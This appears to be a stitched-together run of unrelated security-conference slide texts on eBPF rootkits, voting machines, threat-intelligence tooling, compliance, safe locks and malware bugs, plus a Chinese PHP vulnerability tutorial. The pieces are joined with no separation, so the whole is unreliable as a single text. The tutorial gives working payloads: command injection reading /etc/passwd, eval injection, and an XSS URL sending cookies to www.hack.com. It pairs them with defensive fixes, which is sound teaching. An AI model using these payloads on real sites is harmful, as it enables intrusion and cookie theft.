2021 ● ARP scanner & SYN scanner ● XDP only ● Discover hosts and services which the host doesn’t necessarily talk to ⇒ XDP can’t generate packets, so we had to figure out how to make hundreds of SYN requests ... Active network discovery 44 Abusing eBPF to build a rootkit Network discovery: active method Defcon 2021 ARP request SYN scan Client answer 45 Abusing eBPF to build a rootkit Network discovery: active method Demo Active network discovery Defcon 2021 46 Abusing eBPF to build a rootkit RASP evasion ● Runtime Application Self-Protection (RASP) ● Advanced input monitoring tool ● Textbook example: SQL injection ○ Hook HTTP server library functions ○ Hook SQL library functions ○ Check if user controlled parameters are properly sanitized before executing a query Defcon 2021 A RASP relies on the assumption that the application runtime has not been compromised 47 Abusing eBPF to build a rootkit RASP evasion: SQL injection with a golang application Defcon 2021 48 Abusing eBPF to build a rootkit RASP evasion: SQL injection with a golang application Defcon 2021 49 Abusing eBPF to build a rootkit RASP evasion: SQL injection with a golang application Demo Bypass SQL injection protection Defcon 2021 50 Detection and mitigation Defcon 2021 51 Detection and mitigation Step 1: assessing an eBPF based third party vendor ● Audit & assessment ○ Ask to see the code ! (GPL) ○ Look for sensitive eBPF patterns: ■ program types ■ eBPF helpers ■ cross program types communication ● Useful tool: “ebpfkit-monitor” ○ parses ELF files and extract eBPF related information ○ https://github.com/Gui774ume/ebpfkit-monitor Defcon 2021 52 Detection and mitigation Step 1: assessing an eBPF based third party vendor “ebpfkit-monitor” can list eBPF programs with sensitive eBPF helpers Defcon 2021 53 Detection and mitigation Step 1: assessing an eBPF based third party vendor “ebpfkit-monitor” shows suspicious cross program types communications Defcon 2021 54 Detection and mitigation Step 2: runtime mitigation ● Monitor accesses to the “bpf” syscall ○ Keep an audit trail ○ “ebpfkit-monitor” can help ! ● Protect accesses to the “bpf” syscall: ○ Block bpf syscalls from unknown processes ○ Reject programs with sensitive eBPF helpers or patterns ○ Sign your eBPF programs (https://lwn.net/Articles/853489) ○ “ebpfkit-monitor” can help ! ● Prevent unencrypted network communications even within your internal network Defcon 2021 55 Detection and mitigation Step 3: Detection & Investigation ● It is technically possible to write a perfect eBPF rootkit * ● But: ○ look for actions that a rootkit would have to block / lie about to protect itself ○ (if you can) load a kernel module to list eBPF programs ○ (if you can) load eBPF programs to detect abnormal kernel behaviors ○ monitor network traffic anomalies at the infrastructure level ● Disclaimer: our rootkit is far from perfect ! * with enough time, motivation, insanity, and absolute hatred for life. Defcon 2021 Thanks ! “ebpfkit” source code: https://github.com/Gui774ume/ebpfkit “ebpfkit-monitor” source code: https://github.com/Gui774ume/ebpfkit-monitor
Climbing Everest Voting 101 Voting in the US • Highly decentralized: – Federal government sets broad standards – Each state has own laws, rules, requirements – Elections run by counties (>3000 in US) – Voting takes place in neighborhood precincts • tens, hundreds or thousands per county • Complex: – Typical election has many races – Precinct may have several different ballots Feds vs. States HAVA Pregnant Dimpled Hanging • Favorite HAVA quote: “For States that do not use electronic equipment to assist voters with ‘detecting errors’, they must: Establish a voter education program Provide voter with instructions* *emphasis added Who are we? ES&S Structure Computerized Voting • Direct Recording Electronic (DRE) – specialized voting computer, typically with touch-screen interface – records voter selections internally • Precinct Counted Optical Scan – voter fills out a paper ballot (fill in circles) • ballot marking devices can assist disabled – voter inserts ballot into precinct ballot reader, which either accepts ballot and records vote or rejects and returns ballot to voter • Centrally (County) Counted Optical Scan – absentee ballots The Horror, the Horror Lines of Code vs. % of Market Share* ES&S - 670000+ - > 40% market share Premier- 334000+ - > 40% market share Other > 20% : Hart - 300000+ Sequoia - 800000+ *sorry, there’s no correlation My Buffer Overfloweth If it’s good enough for a minibar… Only 2 for the whole country Scanner Key Part Number #75506 Seals Any Port in a Storm Major Malfunction “With a little token…” Well… it has passwords and encryption. “Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin” -- John Von Neumann, 1951 “Random numbers should not be generated with a method chosen at random” -- Donald Knuth, The Art of Computer Programming Vol 2 “The best defense against logic is ignorance” -- anon It’s not a backdoor, it’s a feature Photo Courtesy of Brickshelf.com i’m in ur DRE, changin’ ur votes Micah’s hands Zippedy-do-dah Penn Lion Give me a P Paper ballots Whiteout Non-read Give me an R Give me a U • Give me a C - Cast multiple votes, Erase audit logs Disable VVPAT Zero Totals IOW, *Anything* What’s that Spell? PRUC! of course it may spell PRUC, but it means… VIRAL PROPAGATION Conclusions • All academic, right? Conclusions • All academic, right? • Unsafe at any speed. Conclusions • All academic, right? • Unsafe at any speed • What can you do? Conclusions • All academic, right? • Unsafe at any speed • What can you do? – VOTE! Conclusions • All academic, right? • Unsafe at any speed • What can you do? – VOTE! – Become a Poll Worker Conclusions • All academic, right? • Unsafe at any speed • What can you do? – VOTE! – Become a Poll Worker – Build a better system We are going to win anyway.
Index Veritas Project Computer Security Trends Military Intelligence American Minds Submit HQ Contact Us Understanding the Security Trends Interface So how does this thing work? Basically the premise of this study is to track increases in "chatter" (based on keywords) just like what ECHELON, INTERPOL, or the other intelligence gathering organizations does out there. This is based on information gathered through forums, websites, blogs, and data from various contributors. This how-to presents a quick overview of how this whole thing works. Let's start off with a simple data mining exercise. For this one, let us search for increases in chatter on the keyword "DEFCON". This is done by entering DEFCON in the "chatter" field and putting the mode as "manual". I'll explain later the difference between "manual" and "computer-assisted" later as well as the "level" field. Press "Go" and you will get this: Note that the increases in DEFCON chatter expectedly corresponds around the time for call for papers and the conference itself. Next let's try overlaying it with something we know that is related to DEFCON, the keyword "PAPERS". Using the same instructions, we add the word "PAPERS" in the chatter field separated by a space. Here's what we get: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 1 of 9 4/25/2009 8:06 PM Note that increases in chatter on the keyword "PAPERS" happen before and after the CFP and before and after the conference itself. Notice how closely the the increases in chatter follows. You'll notice a strange increase in "PAPER" chatter around the end of the year. Could this be still related to DEFCON? Possibly, but let's look more closely. The next demo will show you the "computer-assisted" mode. The computer-assisted mode let's the computer or more specifically, the AI algorithms to determine which keywords are related to the topic we are researching. Remember, in our first search, we manually determined that there could be a relationship between DEFCON and PAPERS. This time, we will let the computer decide for us what keywords are related with each increase in DEFCON chatter. To do this, just type in DEFCON, leave the level to 2 and then check "computer-assisted" as the mode. After pressing "Go" you'll get this: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 2 of 9 4/25/2009 8:06 PM In this result, the algorithms running this process determined that the words on the legend located in the right hand side are those that are the most related to the keyword DEFCON. The increases in chatter for each related word is plotted in the graph. You'll see 7 topics that the algorithm deemed are the most related, if you want to see more related keywords, you can adjust the level by changing the "level" field. Try changing it to 5 and you'll get this: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 3 of 9 4/25/2009 8:06 PM Note that there are more keywords now that the algorithms are identifying as related to DEFCON. The higher the level, the more related keywords the algorithms tries to plot in the graph. Sometimes, this could be a bit overwhelming and due to the nature of artificial intelligence algorithms, sometimes not entirely accurate (think Terminator and I,Robot - misinterpreting stuff like killing us all to save the earth), so you'll have to fine tune your searches and temper it with good old human intuition and interpretation. You'll notice that one of the related keywords that the algorithms are identifying is actually "SUBMISSIONS". To see a clearer view on how it relates to the keyword DEFCON, we can change the mode back to "manual" and overlay it with the "DEFCON" like what we did in "PAPERS". Here's what you'll get: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 4 of 9 4/25/2009 8:06 PM Note that it is fairly similar to the "PAPERS" search except that the "SUBMISSION" increases in chatter happen after the CFP and before the actual conference which makes sense since submissions are done before the conference starts unlike papers which could have increases in chatter before and after the conference. Notice that we still see some unusual spikes in submission at the end and beginning of the year which may or may not be totally related to DEFCON. One explanation of this spike could be seen in the "computer-assisted" search that we did before. Note that another security conference appears there which is "RSA". Let's try plotting "DEFCON", "RSA", and "SUBMISSIONS" in manual mode: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 5 of 9 4/25/2009 8:06 PM Note that in this search you'll see an increase in chatter of the "RSA" keyword around April. This could be a possible hypothesis explaining the increase in chatter on "SUBMISSIONS" on the period before that. Of course, there could be other explanations if you do other correlations but for this view, it does make sense. We can always say that surveillance, threat intelligence and similar activities like this one can be more art than science and depends a lot on the analyst that does the interpretation of the chart. For example, let's do a search on "DEFCON" and "CRIME": The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 6 of 9 4/25/2009 8:06 PM Note that after the actual conference there is an increase in chatter on the keyword "CRIME". Obviously, it will be irresponsible to say that the confernce promotes an increase in crime right? If I was the Central Terminator AI, then DEFCON won't be here anymore. Thus it is safe to say that before you make conclusions, remember to do more in depth "human" research. Remember that this tool is meant to assist you in identifying trends, not dictate what the trends are. Looking at the graph though, it is certainly an interesting coincidence that is worth looking at. Here's another example, this time an overlay between "DEFCON" and "BOTNET". The keyword "BOTNET" actually shows up using the computer-assisted mode which means that it has a high correlation with the keyword "DEFCON": The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 7 of 9 4/25/2009 8:06 PM Note that there's a very noticeable increase in chatter on the keyword "BOTNET" around the times that "DEFCON" chatter increases also. Aside from, this you can also go to a monthly view which shows "clusters" which are basically words that are related to each other. This example shows the March 2009 Monthly Topic Analysis: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 8 of 9 4/25/2009 8:06 PM Notice that group of words has probably has a high correlation with the DEFCON call for papers. Not too sure why Heartland appears there too but there's probably a link that will come up with further research. Note that the words listed below the cluster can be clicked and this will automatically be plotted in the graph in manual mode so you can see the increases in chatter for that keyword throughout the time period available. A facility to cross-correlate and search in Google is also provided to provide the "human" research factor that I have been mentioning throughout this how-to. Hope my explanation made sense. Happy hunting! Click here to go back to the study Suggest a Topic Want us to data mine a topic? Send us your topic at veritasproject@gmail.com Do It Yourself Want to learn to make these? Jumpstart your knowledge with these resources. Go! Contact Us Email: veritasproject@gmail.com top All contents © copyright 2007 Hawaii Honeynet Project and Secure-DNA. All rights reserved. The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 9 of 9 4/25/2009 8:06 PM
Compliance: The Enterprise Vulnerability Roadmap • • • Weasel Nomad Mobile Research Centre weasel@nmrc.org Introduction The Semi-Security State of Compliance • Overview of Compliance Benefits and Standards • Things Compliance Gets Wrong • Detrimental effects of Compliance Compliance Benefits • Old, hard-to-sell controls finally being implemented • Standardization of common controls • Credentials for lazy people who don’t want to work or go to school (OK, so that’s not a benefit…) Compliance Standards • COBIT • PCI DSS • HIPAA Compliance Standards (Cont) • GLBA • SOX • ISO • ITAF The Psychological Impact of Compliance on the Enterprise • False Senses of Security • Misinterpretations of concepts • Budgetary and Resource Shifting and Mayhem • The “Pass the Audit” vs. “Secure the Systems” Paradox Compliance brings us a new fingerprinting foundation • Standards == Defined Attack Matrix – Passwords (length, complexity, age, etc), Data Retention, Encryption Standards, Focal Points • Data retention – What data is known to exist before it is even found • Configuration Management – Workstation, Server, Data Centers, Infrastructures • Policy – Policy-level weaknesses and vulnerabilities Other Standardizations • Encryption requirements – standard algorithms • No time wasted forcing non-compliant algorithms – sensitive data flagging • Encryption flags the “juicy stuff” – Key management Compliance is the Self-Devouring Serpent • Misrepresented/Misinterpreted Postures • Conflict of Interests • Governance Hypocrisies • "Secure" vs. "Passing Audit" paradox • Things you may not have known about compliance boards The Anti-Progression Trap • Compliancy can lock organizations into “old” technologies and architectures – Requiring Firewalls where emerging concepts don’t call for one – “Anti-virus is Dead” Notes on the "Risk Bandwagon" • Definition • A new mentality is evolving – Knowing the enemy before you know who it is Case Examples Conclusion Q&A Credits Links
No MAS: Mike Davis (misadventures in high security lock design) Introduction • I Hack stuff for IOActive Weird embedded stuff • Amateur lock picker I’m not very good • Pretty good understanding of how the pixies flow • I’m not interested in hacking one thing, I want to hack all of the things. 2 Todays plan • We’re going to (try to) think like a lock vendor • Quick look at the evolution of ”High Security” lock design and a look at the seemingly pervasive flaw that these design requirements and decisions lead to. • Look at how the same flaw keeps expressing itself. • Discuss responsible cdisclosure a bit 3 Design Requirements! • Lock • Electronic • Audit trail • Long lived power solution Replacing batteries isn’t really an option. • Permissions systems not entirely related to physical possession of the key • Drop-in replacement for the traditional mechanisms. Mmm physical constraints… • More secure-er then traditional (mechanical) designs! Because… electronic! 4 Lock Design 6 Lock Design + Security 7 Cyberlock 8 “As the CyberLock is directly powered through the communications port, it appears that an SPA (power analysis) attack may succeed against a CyberLock in-situ, as the lock leaks a significant power side-channel to any potential “key” as the processor slowly clocks the key across an I2C bus at the Fcpu/4 bps. However, this approach seems somewhat overboard given the existing issues.” -IOActive Cyberlock Advistory Cyberlock – power hungry • I Hack stuff for IOActive 9 Some lessons learned • Pluses Drop in replacements for classical design Locks don’t need batteries Audit trails and permission systems • Minuses Bullshit crypto Reliant on external power Could not be fixed 10 A Quick Tangent 11 Yet Another Design • I Hack stuff for IOActive 12 Some lessons learned • Pluses Cheap Battery failure doesn’t kill safe • Minuses Still reliant on external power Introduction of secondary side-channels (beep) 13 Another quick Tangent 14 15 “So, here’s where the money is stored in an ATM, as you can see it's protected with this heavy door; which in the old days criminals were trying to break into this, so by now they are more sophisticated” – Guy I owe a beer to. 16 17 QUESTIONS? 18 No MAS: Mike Davis (misadventures in high security lock design No MAS: AuditCon Gen2 S2000 ”Encrypted” 22 The combinations, ATM, bank and master, are typically stored in encrypted form as an added security factor; the form of encryption is not critical. The preferred encryption is to distribute the bits of a binary representation of the combination in various locations of a memory and filling the unoccupied locations in the memory with random binary bits to disguise the combination. Decryption involves removal of the random binary bits and reassemblage of the remaining bits representing combination. Other encryption/decryption schemes may be used in lieu of the preferred scheme if desired. - Patent US5488660A • There is no cryptography used, there is just no room for it • The Locks load their personality on every single boot before accepting combinations • Every lock is identical with the exception of their EEPROM contents • Each type of lock works a bit differently 23 What exactly is encrypted? 24 [ SOFT I2C REQ ] [ HARDWARE I2C RESPONSE ] Soft I2C • I Hack stuff for IOActive 25 Hardware I2C • I Hack stuff for IOActive 26 Pop! 27 Demo! 28 “Gen2” AuditCon “… but what about Gen2?” *gen2 is… interesting.. Done Right? • Write advisory • Do disclosure • …DEFCON 30 Fuuuuuuu. • Sometimes Kaba != Kaba • We called the wrong Kaba, but they make locks too! • From pictures of their locks found online they seem to share the same design pattern (https://www.keypicking.com/viewtopic.php?f=100&t=8680) • “I believe that you will find that the X-09 design different enough to be much more of a challenge. If you are experimenting on an X-10 lock, you have obtained the lock illegally and whoever from the U.S. provided / sold you the lock will be pursued by U.S. Federal agents.” 31 32 No MAS: Mike Davis (misadventures in high security lock design No MAS: Mike Davis (misadventures in high security lock design X-08 X-09 37 38 WHY REDUNDANT DESIGN MATTERS.. No MAS: Mike Davis (misadventures in high security lock design No MAS: Mike Davis (misadventures in high security lock design But… What about the X-10? “Based on the information presented at the meeting, it does not look like it would be beneficial to spend any time looking at the X-10 model.” - GSA Questions? MDavis@IOActive.com Did I even leave time for questions?
针对 PHP 的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、Session 固定攻击(Session Fixation) 9、HTTP 响应拆分攻击(HTTP Response Splitting) 10、文件上传漏洞(File Upload Attack) 11、目录穿越漏洞(Directory Traversal) 12、远程文件包含攻击(Remote Inclusion) 13、动态函数注入攻击(Dynamic Variable Evaluation) 14、URL 攻击(URL attack) 15、表单提交欺骗攻击(Spoofed Form Submissions) 16、HTTP 请求欺骗攻击(Spoofed HTTP Requests) 以后的每期连载,会逐个介绍这些漏洞的原理和防御方法。 几个重要的 php.ini 选项 Register Globals php>=4.2.0,php.ini 的 register_globals 选项的默认值预设为 Off,当 register_globals 的设定 为 On 时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于 PHP 不必事先初始化变量的值,从而导致很大的安全隐患。 例 1: //check_admin()用于检查当前用户权限,如果是 admin 设置$is_admin 变量为 true,然后下面 判断此变量是否为 true,然后执行管理的一些操作 //ex1.php <?php if (check_admin()) { $is_admin = true; } if ($is_admin) { do_something(); } ?> 这一段代码没有将$is_admin 事先初始化为 Flase,如果 register_globals 为 On,那么我们直 接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过 check_admin()的验证 例 2: //ex2.php <?php if (isset($_SESSION["username"])) { do_something(); } else { echo "您尚未登录!"; } ?> 当 register_globals=On 时 , 我 们 提 交 http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限 所以不管 register_globals 为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变 量要初始化 safe_mode 安全模式,PHP 用来限制文档的存取、限制环境变量的存取,控制外部程序的执行。启用 安全模式必须设置 php.ini 中的 safe_mode = On 1、限制文件存取 safe_mode_include_dir = "/path1:/path2:/path3" 不同的文件夹用冒号隔开 2、限制环境变量的存取 safe_mode_allowed_env_vars = string 指定 PHP 程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个 选项的值为空时,那么 php 可以改变任何环境变量 safe_mode_protected_env_vars = string 用来指定 php 程序不可改变的环境变量的前缀 3、限制外部程序的执行 safe_mode_exec_dir = string 此选项指定的文件夹路径影响 system、exec、popen、passthru,不影响 shell_exec 和“` `”。 disable_functions = string 不同的函数名称用逗号隔开,此选项不受安全模式影响 magic quotes 用来让 php 程序的输入信息自动转义,所有的单引号(“'”),双引号(“"”),反斜杠(“\”)和空字 符(NULL),都自动被加上反斜杠进行转义 magic_quotes_gpc = On 用来设置 magic quotes 为 On,它会影响 HTTP 请求的数据(GET、 POST、Cookies) 程序员也可以使用 addslashes 来转义提交的 HTTP 请求数据,或者用 stripslashes 来删除转义 PHP 漏洞全解(二)-命令注入攻击 命令注入攻击 PHP 中可以使用下列 5 个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、``(与 shell_exec 功能相同) 函数原型 string system(string command, int &return_var) command 要执行的命令 return_var 存放执行命令的执行后的状态值 string exec (string command, array &output, int &return_var) command 要执行的命令 output 获得执行命令输出的每一行字符串 return_var 存放执行命令后的状态值 void passthru (string command, int &return_var) command 要执行的命令 return_var 存放执行命令后的状态值 string shell_exec (string command) command 要执行的命令 漏洞实例 例 1: //ex1.php <?php $dir = $_GET["dir"]; if (isset($dir)) { echo "<pre>"; system("ls -al ".$dir); echo "</pre>"; } ?> 我们提交 http://www.sectop.com/ex1.php?dir=| cat /etc/passwd 提交以后,命令变成了 system("ls -al | cat /etc/passwd"); eval 注入攻击 eval 函数将输入的字符串参数当作 PHP 程序代码来执行 函数原型: mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候 //ex2.php <?php $var = "var"; if (isset($_GET["arg"])) { $arg = $_GET["arg"]; eval("\$var = $arg;"); echo "\$var =".$var; } ?> 当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了 动态函数 <?php func A() { dosomething(); } func B() { dosomething(); } if (isset($_GET["func"])) { $myfunc = $_GET["func"]; echo $myfunc(); } ?> 程 序 员 原 意 是 想 动 态 调 用 A 和 B 函 数 , 那 我 们 提 交 http://www.sectop.com/ex.php?func=phpinfo 漏洞产生 防范方法 1、尽量不要执行外部命令 2、使用自定义函数或函数库来替代外部命令的功能 3、使用 escapeshellarg 函数来处理命令参数 4、使用 safe_mode_exec_dir 指定可执行文件的路径 esacpeshellarg 函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引 号“"”,替换成“\"”,分号“;”替换成“\;” 用 safe_mode_exec_dir 指定可执行文件的路径,可以把会使用的命令提前放入此路径内 safe_mode = On safe_mode_exec_di r= /usr/local/php/bin/ PHP 漏洞全解(三)-客户端脚本植入 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接 文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。 可以被用作脚本植入的 HTML 标签一般包括以下几种: 1、<script>标签标记的 javascript 和 vbscript 等页面脚本程序。在<script>标签内可以指定 js 程序代码,也可以在 src 属性内指定 js 文件的 URL 路径 2、<object>标签标记的对象。这些对象是 java applet、多媒体文件和 ActiveX 控件等。通常 在 data 属性内指定对象的 URL 路径 3、<embed>标签标记的对象。这些对象是多媒体文件,例如:swf 文件。通常在 src 属性内指 定对象的 URL 路径 4、<applet>标签标记的对象。这些对象是 java applet,通常在 codebase 属性内指定对象的 URL 路径 5、<form>标签标记的对象。通常在action 属性内指定要处理表单数据的 web应用程序的 URL 路径 客户端脚本植入的攻击步骤 1、攻击者注册普通用户后登陆网站 2、打开留言页面,插入攻击的 js 代码 3、其他用户登录网站(包括管理员),浏览此留言的内容 4、隐藏在留言内容中的 js 代码被执行,攻击成功 实例 数据库 CREATE TABLE `postmessage` ( `id` int(11) NOT NULL auto_increment, `subject` varchar(60) NOT NULL default '', `name` varchar(40) NOT NULL default '', `email` varchar(25) NOT NULL default '', `question` mediumtext NOT NULL, `postdate` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使 用 者 的 留 言 ' AUTO_INCREMENT=69 ; //add.php 插入留言 //list.php 留言列表 //show.php 显示留言 程序和数据库打包下载地址 点我下载 提交下图的留言 浏览此留言的时候会执行 js 脚本 插入 <script>while(1){windows.open();}</script> 无限弹框 插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面 或者使用其他自行构造的 js 代码进行攻击 防范的方法 一般使用 htmlspecialchars 函数来将特殊字符转换成 HTML 编码 函数原型 string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串 quote_style 可选 , 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值 ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES ,表示双引号和单引号都 要转换。ENT_NOQUOTES ,表示双引号和单引号都不转换 charset 可选,表示使用的字符集 函数会将下列特殊字符转换成 html 编码: & ----> &amp; " ----> &quot; ' ----> &#039; < ----> &lt; > ----> &gt; 把 show.php 的第 98 行改成 <?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?> 然后再查看插入 js 的漏洞页面 PHP 漏洞全解(四)-xss 跨站脚本攻击 XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表 css(Cascading Style Sheet)区 别,缩写为 XSS 跨站脚本主要被攻击者利用来读取网站用户的 cookies 或者其他个人数据,一旦攻击者得到 这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。 跨站脚本攻击的一般步骤: 1、攻击者以某种方式发送 xss 的 http 链接给目标用户 2、目标用户登录此网站,在登陆期间打开了攻击者发送的 xss 链接 3、网站执行了此 xss 攻击脚本 4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息 5、攻击者使用目标用户的信息登录网站,完成攻击 当 有 存 在 跨 站 漏 洞 的 程 序 出 现 的 时 候 , 攻 击 者 可 以 构 造 类 似 http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcoo kie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户 cookies 值 防范方法: 利用 htmlspecialchars 函数将特殊字符转换成 HTML 编码 函数原型 string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串 quote_style 可选 , 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值 ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES ,表示双引号和单引号都 要转换。ENT_NOQUOTES ,表示双引号和单引号都不转换 charset 可选,表示使用的字符集 函数会将下列特殊字符转换成 html 编码: & ----> &amp; " ----> &quot; ' ----> &#039; < ----> &lt; > ----> &gt; $_SERVER["PHP_SELF"]变量的跨站 在某个表单中,如果提交参数给自己,会用这样的语句 <form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST"> ...... </form> $_SERVER["PHP_SELF"]变量的值为当前页面名称 例: http://www.sectop.com/get.php get.php 中上述的表单 那么我们提交 http://www.sectop.com/get.php/"><script>alert(document.cookie);</script> 那么表单变成 <form action="get.php/"><script>alert(document.cookie);</script>" method="POST"> 跨站脚本被插进去了 防御方法还是使用 htmlspecialchars 过滤输出的变量,或者提交给自身文件的表单使用 <form action="" method="post"> 这样直接避免了$_SERVER["PHP_SELF"]变量被跨站 PHP 漏洞全解(五)-SQL 注入攻击 SQL 注入攻击(SQL Injection),是攻击者在表单中提交精心构造的 sql 语句,改变原来的 sql 语句,如果 web程序没有对提交的数据经过检查,那么就会造成 sql 注入攻击。 SQL 注入攻击的一般步骤: 1、攻击者访问有 SQL 注入漏洞的网站,寻找注入点 2、攻击者构造注入语句,注入语句和程序中的 SQL 语句结合生成新的 sql 语句 3、新的 sql 语句被提交到数据库中进行处理 4、数据库执行了新的 SQL 语句,引发 SQL 注入攻击 实例 数据库 CREATE TABLE `postmessage` ( `id` int(11) NOT NULL auto_increment, `subject` varchar(60) NOT NULL default '', `name` varchar(40) NOT NULL default '', `email` varchar(25) NOT NULL default '', `question` mediumtext NOT NULL, `postdate` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使 用 者 的 留 言 ' AUTO_INCREMENT=69 ; grant all privileges on ch3.* to 'sectop'@localhost identified by '123456'; //add.php 插入留言 //list.php 留言列表 //show.php 显示留言 程序和数据库打包下载地址 点我下载 页面 http://www.netsos.com.cn/show.php?id=71 可能存在注入点,我们来测试 http://www.netsos.com.cn/show.php?id=71 and 1=1 返回页面 提交 http://www.netsos.com.cn/show.php?id=71 and 1=2 返回页面 一次查询到记录,一次没有,我们来看看源码 //show.php 12-15 行 // 执行 mysql 查询语句 $query = "select * from postmessage where id = ".$_GET["id"]; $result = mysql_query($query) or die("执行 ySQL 查询语句失败:" . mysql_error()); 参数 id 传递进来后,和前面的字符串结合的 sql 语句放入数据库进行查询 提交 and 1=1,语句变成 select * from postmessage whereid = 71 and 1=1 这语句前值后值都 为真,and 以后也为真,返回查询到的数据 提交 and 1=2,语句变成 select * from postmessage where id = 71 and 1=2 这语句前值为真, 后值为假,and 以后为假,查询不到任何数据 正常的 SQL 查询,经过我们构造的语句之后,形成了 SQL 注入攻击。通过这个注入点,我 们还可以进一步拿到权限,比如说利用 union 读取管理密码,读取数据库信息,或者用 mysql 的 load_file,into outfile 等函数进一步渗透。 防范方法 整型参数: 使用 intval 函数将数据转换成整数 函数原型 int intval(mixed var, int base) var 是要转换成整形的变量 base,可选,是基础数,默认是 10 浮点型参数: 使用 floatval 或 doubleval 函数分别转换单精度和双精度浮点型参数 函数原型 int floatval(mixed var) var 是要转换的变量 int doubleval(mixed var) var 是要转换的变量 字符型参数: 使用 addslashes 函数来将单引号“'”转换成“\'”,双引号“"”转换成“\"”,反斜杠“\”转换成“\\”, NULL 字符加上反斜杠“\” 函数原型 string addslashes (string str) str 是要检查的字符串 那么刚才出现的代码漏洞,我们可以这样修补 // 执行 mysql 查询语句 $query = "select * from postmessage where id = ".intval($_GET["id"]); $result = mysql_query($query) or die("执行 ySQL 查询语句失败:" . mysql_error()); 如果是字符型,先判断 magic_quotes_gpc 是否为 On,当不为 On 的时候使用 addslashes 转义 特殊字符 if(get_magic_quotes_gpc()) { $var = $_GET["var"]; } else { $var = addslashes($_GET["var"]); } 再次测试,漏洞已经修补
making fun of your malware Defcon 17 Matt Richard and Michael Ligh Following the presentation at Defcon 17, you can find the final slides here: http://code.google.com/p/mhl-malware-scripts/Defcon2009_MakingFun.pdf Silent Banker author forgets to seed the PRNG Honey, I Shrunk the Entropy! Off to a bad start… Zeus, September 2007 PRNG used to avoid hash-based detection Silent Banker, Feburary 2008 PRNG used to generate temporary file names Recipe for disaster - step 1 Silent Banker, July 2008 PRNG used to generate encryption key Recipe for disaster 1. Seed the PRNG 2. Generate 16 byte key with 1000 calls to rand() 3. Generate 8 byte number from 16 byte key 4. Generate another 8 byte number from the first 8 byte number and “secd” value from INI configuration file 5. Explode the second 8 byte number into 32 bytes 6. Encrypt stolen data with original 16 byte key from step 2 7. Send the exploded 32 byte number along with stolen data Recipe to exploit the disaster 1. Seed the PRNG TO ZERO 2. Generate 16 byte key with 1000 calls to rand() 3. Generate 8 byte number from 16 byte key 4. Generate another 8 byte number from the first 8 byte number and “secd” value from INI configuration file 5. Explode the second 8 byte number into 32 bytes 6. Encrypt stolen data with original 16 byte key from step 2 7. Send the exploded 32 byte number along with stolen data Disaster recovery The one that got away… Torpig installs MBR rootkit to get a DLL Injected into user-mode programs I created a hyper cool MBR rootkit and all I got was this old trojan DLL The nasty side The funny side The nice side Attacker’s trojan defaults to xor due to invalid size DES key To DES or not to DES? Always make backups! xor backup method How to shoot yourself in the foot MSDN to the rescue Conficker.B’s flawed IP generator only scans a portion of the Internet Honey, sorry to bother you again, I shrunk the Internet The flawed method What’s the big deal? 1. Excludes multicast, private, broadcast, etc 2. Excludes IPs on blacklisted subnets (researcher and A/V networks) 3. Excludes any IP with an octet set to 255 4. Excludes any IP with a last octet set to 0 5. Excludes any IP with a 1 in the upper bit of octets 2 and 4 Simulating the flawed method A/V vendors miss detection of $10m trojan for 15 months because of NOOPS Baffled by the NOOP Neosploit screws everyone Thanks for the cash, now we’re going to dash Laqma arbitrary file upload PHP cookies…mmmm…cookies Coreflood authors re-invent “location dependent encryption” You did what with what? Location dependent encryption ;-) • http://www.freepatentsonline.com/6948062.html Patent pending… How to dump core How to dump core…with wireshark Explorer gets KILL HUP-ed Feebs Yes No Yes ShellServiceObjectDelayLoad Torpig/Mebroot Bankpatch CoreFlood Virtumonde Conficker Zeus Torpig/Mebroot Laqma Vundo Silent Banker Example Yes No No PE patch on disk Yes No Yes ShellIconOverlayIdentifier Yes 